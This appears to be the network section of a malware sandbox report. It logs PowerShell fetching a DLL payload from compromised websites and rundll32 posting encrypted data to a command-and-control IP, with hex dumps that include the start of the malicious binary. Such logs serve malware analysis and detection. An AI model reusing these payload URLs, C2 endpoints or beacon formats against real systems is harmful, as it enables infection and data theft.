                                                    Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63
                                                    Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devic
                                                    Jan 6, 2021 08:36:55.597320080 CET9INData Raw: 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63
                                                    Data Ascii: e-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.erro
                                                    Jan 6, 2021 08:36:55.597368956 CET10INData Raw: 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20
                                                    Data Ascii: "cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy sour
                                                    Jan 6, 2021 08:36:55.597451925 CET11INData Raw: 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70
                                                    Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class
                                                    Jan 6, 2021 08:36:55.597479105 CET11INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.2249167209.59.139.3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 6, 2021 08:36:55.931899071 CET12OUTGET /content/5f18Q/ HTTP/1.1
                                                    Host: veterinariadrpopui.com
                                                    Connection: Keep-Alive
                                                    Jan 6, 2021 08:36:56.093039036 CET13INHTTP/1.1 500 Internal Server Error
                                                    Date: Wed, 06 Jan 2021 07:36:56 GMT
                                                    Server: Apache
                                                    Content-Length: 7309
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>
                                                    Jan 6, 2021 08:36:56.093086004 CET14INData Raw: 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a
                                                    Data Ascii:
                                                    Jan 6, 2021 08:36:56.093122005 CET16INData Raw: 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20
                                                    Data Ascii:
                                                    Jan 6, 2021 08:36:56.093158960 CET17INData Raw: 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                                    Data Ascii:
                                                    Jan 6, 2021 08:36:56.093197107 CET19INData Raw: 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20
                                                    Data Ascii:
                                                    Jan 6, 2021 08:36:56.093229055 CET19INData Raw: 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.2249168210.86.239.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 6, 2021 08:36:58.814183950 CET21OUTGET /wordpress/CGMC/ HTTP/1.1
                                                    Host: khanhhoahomnay.net
                                                    Connection: Keep-Alive
                                                    Jan 6, 2021 08:36:59.089220047 CET22INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 06 Jan 2021 07:36:59 GMT
                                                    Content-Type: application/octet-stream
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Keep-Alive: timeout=60
                                                    X-Powered-By: PHP/7.4.9
                                                    Set-Cookie: 5ff5689b185d4=1609918619; expires=Wed, 06-Jan-2021 07:37:59 GMT; Max-Age=60; path=/
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Last-Modified: Wed, 06 Jan 2021 07:36:59 GMT
                                                    Expires: Wed, 06 Jan 2021 07:36:59 GMT
                                                    Content-Disposition: attachment; filename="rJGdausK.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Data Raw: 31 64 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
                                                    Jan 6, 2021 08:36:59.089245081 CET23INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: U
                                                    Jan 6, 2021 08:36:59.089262962 CET25INData Raw: cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 00 03 de 6a 14 53
                                                    Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1y
                                                    Jan 6, 2021 08:36:59.089274883 CET26INData Raw: 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f 85 c0 74 0e 68 00
                                                    Data Ascii: ut|~tN@(jjQ~t:W39~~Ftv(PF$G;~|F_thjPFthjPVjxPt^]UEHMx|ujl3]PxDUEtztSVuWuB;r]+rr Z$3
                                                    Jan 6, 2021 08:36:59.089292049 CET27INData Raw: 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 00 01 0c 18 8b 07
                                                    Data Ascii: ]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPFN
                                                    Jan 6, 2021 08:36:59.089306116 CET29INData Raw: 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 08 00 00 00 00 8b
                                                    Data Ascii: ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3
                                                    Jan 6, 2021 08:36:59.089318037 CET29INData Raw: 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 50 ff 91 bc 00 00
                                                    Data Ascii: ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWX
                                                    Jan 6, 2021 08:36:59.089333057 CET30INData Raw: 32 30 30 30 0d 0a d3 00 10 bf 05 00 00 00 90 56 8b cb e8 c8 01 00 00 83 c6 0c 4f 75 f2 8b cb e8 1b 00 00 00 8b cb e8 74 03 00 00 8b 45 fc 5f 5e 5b 8b e5 5d c3 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 5c a1 58 21 01 10 33 c5 89 45 fc 8b c1 8d
                                                    Data Ascii: 2000VOutE_^[]3[]U\X!3EME@QEhPLEEVURPQ %W39}SlEUREWPQEEURhPEUWRfEf
                                                    Jan 6, 2021 08:36:59.089350939 CET32INData Raw: f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 f6 79 86 8b c6 8b
                                                    Data Ascii: xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRPv
                                                    Jan 6, 2021 08:36:59.089368105 CET33INData Raw: 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b f0 85 f6 7e 0b 0f
                                                    Data Ascii: x=wuz3fEuPujPS~xLju=jh|WthWuhWtjM_^3[R]UX!3EES]VEW}
                                                    Jan 6, 2021 08:36:59.354291916 CET35INData Raw: 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76
                                                    Data Ascii: ^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v|ovfsvs~vf;u


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.22491695.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 6, 2021 08:37:12.901599884 CET221OUTPOST /9ormjijma/sd2xibclmrp5oftlrxf/ HTTP/1.1
                                                    DNT: 0
                                                    Referer: 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                                    Content-Type: multipart/form-data; boundary=-------------qEVZIKHrPRVz2
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 5.2.136.90
                                                    Content-Length: 8452
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Jan 6, 2021 08:37:12.901701927 CET223OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 71 45 56 5a 49 4b 48 72 50 52 56 7a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 79 4e 4f 42 22 3b 20 66 69 6c 65 6e
                                                    Data Ascii: ---------------qEVZIKHrPRVz2Content-Disposition: form-data; name="yNOB"; filename="xfbWuPBZ"Content-Type: application/octet-streamQmZ\{7,6v%-CA\26FYYg*lNo# 6V&gqCxwu{m(Vl
                                                    Jan 6, 2021 08:37:12.974643946 CET227OUTData Raw: ac d3 20 c2 3c 87 5c bb 2f b0 89 da 12 5b d4 ac 2f 06 53 f5 85 cf a0 cf 04 d6 74 be 7b 79 ef cd 50 c6 54 23 5e 6b 9e 1d db 10 70 d2 99 ba ea b3 c3 71 65 83 54 0b f4 f2 13 64 31 b6 cf cd 00 99 64 d0 2f 6b 93 f3 ef b5 c4 19 38 a6 c9 3d 58 8a 1c fe
                                                    Data Ascii: <\/[/St{yPT#^kpqeTd1d/k8=X{g<3OrrZS|1laFQ#hzz7LBm+Y/gO+p;AoK?Gi'R]zdHq-?`SQ?VNBV4itHxz SQ/pA\
                                                    Jan 6, 2021 08:37:13.047550917 CET230OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 6, 2021 08:37:13.743518114 CET231INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 06 Jan 2021 07:37:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Vary: Accept-Encoding
                                                    Data Raw: 38 38 34 0d 0a c1 a1 48 d7 43 03 a6 c0 f9 4e 0a 16 25 4c c0 9d 2b ee 92 2d ac 66 c1 1e 35 35 99 da ee 82 a1 10 20 e0 dd 7e 9f 3f d9 a6 b5 d8 4b 10 d1 c3 13 17 f1 0a b5 86 37 79 e4 1f de 58 6e 63 80 16 5a 80 65 82 72 83 df 73 fb 94 04 f2 47 9d b9 fc 4a 44 16 5d bf cc d7 b2 7f ad 04 68 6c 91 88 95 ef 44 1f 7c 78 70 64 43 46 46 10 d5 fd b7 a4 68 b6 4a 34 25 36 c6 3d bc 35 60 6b 02 d5 34 03 c0 c5 97 bb 00 dd 4b 88 d3 98 3c b8 bf 7f fc f6 4c 7f 10 3c 2a 2b 44 57 ce f5 ba db 15 be 96 9d a6 c5 a1 b9 ea 57 f9 7d 87 d9 32 04 85 8b 57 63 42 41 1b b5 46 52 d5 3f a0 96 05 35 24 36 30 3b 6e ae b5 dd 62 56 bf 46 a7 dc 4a 0a eb 3f b8 29 6e d6 9e cb f4 c8 56 0a 9f d9 fc 0d 21 30 b9 ef ed 4a 85 cc 41 8b 9f fa 69 93 52 71 9e 4b e4 09 86 70 14 86 84 f0 8b 16 f9 44 97 ba da 39 32 f1 4c 7f 4a df 5c 43 a3 30 2d b8 88 ed cf 3e ba 9d 97 b2 42 15 81 14 2f 4b cb e6 71 34 cf b8 38 9b 75 61 1f 31 dd cd 43 a2 cb f5 a4 6a 69 9f c0 07 0d b9 c4 2b 3d 95 be 1a 5d 1e f6 fc 14 2f 93 f4 8d ab cd 49 21 3d aa cf 0a 8e 37 0a 0e 66 e7 20 c3 7f 0d 3c 80 53 4d 3b 7d da 14 f4 c1 23 64 93 ca 05 06 5d 40 db f7 52 39 0f 0c fd dc ba 60 6f 7e 6d 01 e3 e7 1e c5 66 3c 71 f6 91 21 63 97 6b 79 e0 33 80 b8 86 c8 f0 4e 3f 38 dd 40 e5 5d b8 36 c3 37 d3 67 11 b2 c9 81 d6 65 04 d9 39 b7 8f e4 7e ec 55 9a 49 4c 64 99 49 1c 11 c9 f1 8b 86 9b 21 12 38 40 02 7b a6 ce d5 8c 9e 56 ca 20 e9 7f 4c 8f 7f 4f 